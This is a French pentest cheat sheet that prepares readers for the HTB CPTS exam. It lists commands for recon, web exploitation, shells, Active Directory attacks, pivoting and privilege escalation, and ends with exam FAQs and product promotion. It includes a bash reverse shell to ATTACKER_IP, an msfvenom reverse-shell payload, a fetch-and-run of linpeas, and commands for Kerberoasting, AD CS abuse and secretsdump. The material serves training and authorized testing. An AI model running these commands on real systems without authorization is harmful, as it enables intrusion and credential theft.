# Information Gathering
Le réseau CPTS est un environnement d'entreprise réaliste. Cartographie toute la surface externe et interne avant de toucher à quoi que ce soit — une énumération exhaustive pilote toute la chaîne d'attaque.
Scan de ports & services
nmap -p- --min-rate=1000 -T4 TARGET -oN ports.txt
nmap -p OPEN_PORTS -sC -sV -oA detailed TARGET
Sous-domaines & OSINT
subfinder -d TARGET -silent | httpx -silent -title -tech-detect
curl -s 'https://crt.sh/?q=%.TARGET&output=json' | jq -r '.[].name_value' | sort -u
Découverte de contenu web
ffuf -u http://TARGET/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -e .php,.aspx,.txt -mc all -fc 404
ffuf -u http://TARGET -H "Host: FUZZ.TARGET" -w subdomains.txt -fs 0
Énumération SMB & domaine
netexec smb TARGET -u '' -p '' --shares
enum4linux-ng -A TARGET
# Analyse de vulnérabilités
La CPTS attend une étape structurée d'analyse de vulnérabilités : associe chaque service à ses faiblesses connues avant d'exploiter, et documente tout pour le rapport.
nuclei -u https://TARGET -t cves/ -t misconfiguration/ -severity medium,high,critical
nikto -h http://TARGET -C all
searchsploit SERVICE VERSION
curl -s "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-XXXX-XXXXX" | jq '.vulnerabilities[0].cve.metrics'
# Exploitation Web
Les applications web sont un foothold fréquent en CPTS. Injection, upload de fichiers, SSTI et inclusion ouvrent la porte du réseau interne.
Injection SQL
sqlmap -r request.txt --batch --level 5 --risk 3 --dbs
Template Injection (SSTI)
{{7*7}} ${7*7} #{7*7}
Inclusion de fichiers
curl "http://TARGET/?page=php://filter/convert.base64-encode/resource=config"
Bypass d'upload
cp shell.php shell.phar # essayer .phtml, .php5, double ext, magic bytes
# Shells & Payloads
Obtiens un foothold stable, puis passe à un shell interactif complet pour la phase interne.
bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1
python3 -c 'import pty;pty.spawn("/bin/bash")'; export TERM=xterm
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f exe -o s.exe
# Active Directory
L'Active Directory est le cœur de l'examen CPTS. Cartographie les chemins d'attaque avec BloodHound, récupère des credentials, abuse d'AD CS, et pivote jusqu'au Domain Admin.
bloodhound-python -d domain.local -u USER -p PASS -c All -ns DC_IP
impacket-GetUserSPNs domain.local/USER:PASS -dc-ip DC_IP -request
impacket-GetNPUsers domain.local/ -no-pass -usersfile users.txt -dc-ip DC_IP
certipy find -u USER@domain.local -p PASS -dc-ip DC_IP -vulnerable -stdout
certipy req -u USER@domain.local -p PASS -ca CA-NAME -template VulnTemplate -upn administrator@domain.local
impacket-secretsdump domain.local/ADMIN:PASS@DC_IP
evil-winrm -i TARGET -u USER -H NTLM_HASH
# Pivoting & Tunneling
Le réseau CPTS est segmenté. Tu compromettras un hôte dans un sous-réseau et pivoteras plus loin — ligolo-ng et chisel sont les outils de référence.
Ligolo-ng (recommandé)
./proxy -selfcert # sur Kali, puis : interface ip add 240.0.0.1/32 route
./agent -connect ATTACKER_IP:11601 -ignore-cert
Chisel & SSH
./chisel server -p 8080 --reverse # client : ./chisel client ATTACKER_IP:8080 R:socks
proxychains4 netexec smb 10.10.0.0/24
# Élévation de privilèges
L'élévation locale sur les hôtes Linux et Windows réinjecte des credentials dans la compromission du domaine.
Linux
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
sudo -l ; find / -perm -4000 -type f 2>/dev/null
Windows
.\winPEASx64.exe ; whoami /priv
.\GodPotato.exe -cmd "cmd /c whoami"
# Reporting
La CPTS est notée sur un rapport commercial-grade — c'est là que se joue l'essentiel des points. Structure-le professionnellement et rends chaque finding reproductible.
# Résumé exécutif → Chaîne d'attaque → Findings (CVSS + étapes) → Synthèse de remédiation
hashcat -m 13100 kerberoast.txt /usr/share/wordlists/rockyou.txt # documente les creds cassés
# Conseils Examen CPTS
Stratégie pour les 10 jours d'examen plus le rapport. C'est sur le rapport que les candidats perdent le plus de points.
❓ Questions fréquentes CPTS
L'examen HTB CPTS est une évaluation 100% pratique de 10 jours sur un réseau Active Directory d'entreprise réaliste, suivie d'un temps pour rédiger un rapport commercial-grade. Il faut atteindre un nombre de flags requis ET remettre un rapport professionnel — le rapport est obligatoire et fortement pondéré.
Leur focus diffère. La CPTS a une composante Active Directory et de chaînage bien plus large et réaliste, et un fort accent sur le rapport professionnel ; l'OSCP inclut des machines indépendantes et une fenêtre plus courte de 23h45. Beaucoup considèrent la CPTS plus large et plus orientée entreprise ; l'OSCP reste la référence historique.
Oui. La CPTS est notée sur un rapport commercial-grade, pas seulement sur les flags. Il doit inclure un résumé exécutif, un narratif de chaîne d'attaque, et des findings avec sévérité, CVSS, hôtes affectés, étapes de reproduction et remédiation. HTB supporte officiellement SysReptor, et les outils Markdown s'importent proprement.
nmap, ffuf/feroxbuster, nuclei, BloodHound/SharpHound, impacket (GetUserSPNs, secretsdump, psexec), certipy (AD CS ESC1–ESC8), evil-winrm, NetExec/CrackMapExec, ligolo-ng ou chisel pour le pivoting, et hashcat. Reporting avec SysReptor ou le rapport IA de Pentest Mindmap.
Le job path « Penetration Tester » de HTB Academy fait environ 250+ heures et couvre tout le programme CPTS. La plupart des candidats ont besoin de 2 à 5 mois selon leur expérience, avec un fort focus sur Active Directory, le pivoting et le reporting.
Oui — massivement. Le réseau d'examen CPTS est un environnement AD d'entreprise. Maîtrise l'analyse de chemins BloodHound, le Kerberoasting, l'AS-REP roasting, l'abus AD CS (certipy ESC1–ESC8), le relais NTLM, le DCSync et le mouvement latéral jusqu'au Domain Admin.
Non. Contrairement à l'OSCP classique, la CPTS ne se concentre pas sur l'exploitation manuelle de buffer overflow. Elle met l'accent sur des chaînes d'attaque d'entreprise réalistes, l'exploitation web et Active Directory, le pivoting et le reporting professionnel.
ESC1 est une mauvaise configuration d'Active Directory Certificate Services où un template vulnérable autorise l'authentification client et laisse l'enrollee fournir le sujet. Avec certipy, tu peux demander un certificat au nom d'un Domain Admin et obtenir un TGT — un chemin rapide vers la compromission du domaine, fréquent sur les AD modernes testés en CPTS.
Résumé exécutif (non-technique), périmètre de la mission, un narratif de chaîne d'attaque réaliste, des findings détaillés (description, impact, hôtes affectés, vecteur CVSS v3.1, étapes de reproduction, remédiation, références) et une synthèse de remédiation priorisée. Reste commercial-grade et reproductible.
Oui — comme accélérateur de préparation. La mindmap gratuite organise 12 020+ commandes couvrant les domaines CPTS, l'Espace Pentest fournit un template de rapport CPTS dédié, et l'AI Wizard génère un rapport style CPTS commercial-grade. Il accélère l'apprentissage de la méthodologie — respecte toujours les règles de ton examen.
📚 Ressources liées
- Cheatsheet Active Directory — De BloodHound au Domain Admin — le cœur de l'examen CPTS
- Cheatsheet OSCP — L'équivalent OffSec — 150+ commandes pour l'examen OSCP
- Cheatsheet PNPT — L'équivalent TCM — OSINT, AD et le debrief oral de 15 min
- Cheatsheet Nmap — Référence nmap complète pour la recon et le scan de ports
- Cheatsheet Élévation de privilèges Linux — 80+ techniques de privesc pour la phase interne
- Guide du rapport de pentest — Structure, template et sections requises pour un rapport commercial-grade
- Cheatsheet Pentesting complète — 200+ commandes pour web, réseau, Active Directory et privesc
Transforme tes findings en rapport CPTS commercial-grade. L'AI Wizard a un format CPTS dédié avec chaîne d'attaque et findings CVSS.
Prépare ta CPTS avec 12 020+ commandes
Cette cheatsheet n'est que la surface. Pentest Mindmap organise 12 020+ commandes en 34 catégories avec recherche instantanée, un template de rapport CPTS et un générateur de rapport IA.
Commencer gratuitement →